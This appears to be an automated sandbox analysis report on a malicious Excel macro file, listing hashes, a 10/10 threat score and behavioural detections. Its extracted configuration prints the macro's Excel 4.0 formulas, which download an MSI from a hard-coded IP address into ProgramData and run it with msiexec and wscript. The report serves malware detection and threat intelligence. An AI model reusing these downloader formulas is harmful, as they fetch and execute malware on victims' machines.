General
-
Target
37b63c24482584a370356b2099ef9842
-
Size
6KB
-
Sample
231222-at8xysfhhq
-
MD5
37b63c24482584a370356b2099ef9842
-
SHA1
cd519de919291b7027044f1134d95f361c76e02b
-
SHA256
dfa04237fd2a1c9b8becb7cb34be76d6f82cf969d02773b0e27cfec53ddb9c4b
-
SHA512
dac02127d9075f86a3ed43c18217e48902ef06c3fad60cdeb7b166004e35eddae8b1dac4515453fc8b5d21c979ddb82f93d4ab3e8a25b4aa8dcc8be63737e74e
-
SSDEEP
192:NDS0uSw1aEOmmfRN8UhHFBFYuLb98yOTKs:N/uxwr1FYmb98yOOs
Static task
static1
Behavioral task
behavioral1
Sample
37b63c24482584a370356b2099ef9842.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
37b63c24482584a370356b2099ef9842.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187
-
formulas
=EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()
Extracted
http://46.17.98.187
Targets
-
-
Target
37b63c24482584a370356b2099ef9842
-
Size
6KB
-
MD5
37b63c24482584a370356b2099ef9842
-
SHA1
cd519de919291b7027044f1134d95f361c76e02b
-
SHA256
dfa04237fd2a1c9b8becb7cb34be76d6f82cf969d02773b0e27cfec53ddb9c4b
-
SHA512
dac02127d9075f86a3ed43c18217e48902ef06c3fad60cdeb7b166004e35eddae8b1dac4515453fc8b5d21c979ddb82f93d4ab3e8a25b4aa8dcc8be63737e74e
-
SSDEEP
192:NDS0uSw1aEOmmfRN8UhHFBFYuLb98yOTKs:N/uxwr1FYmb98yOOs
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-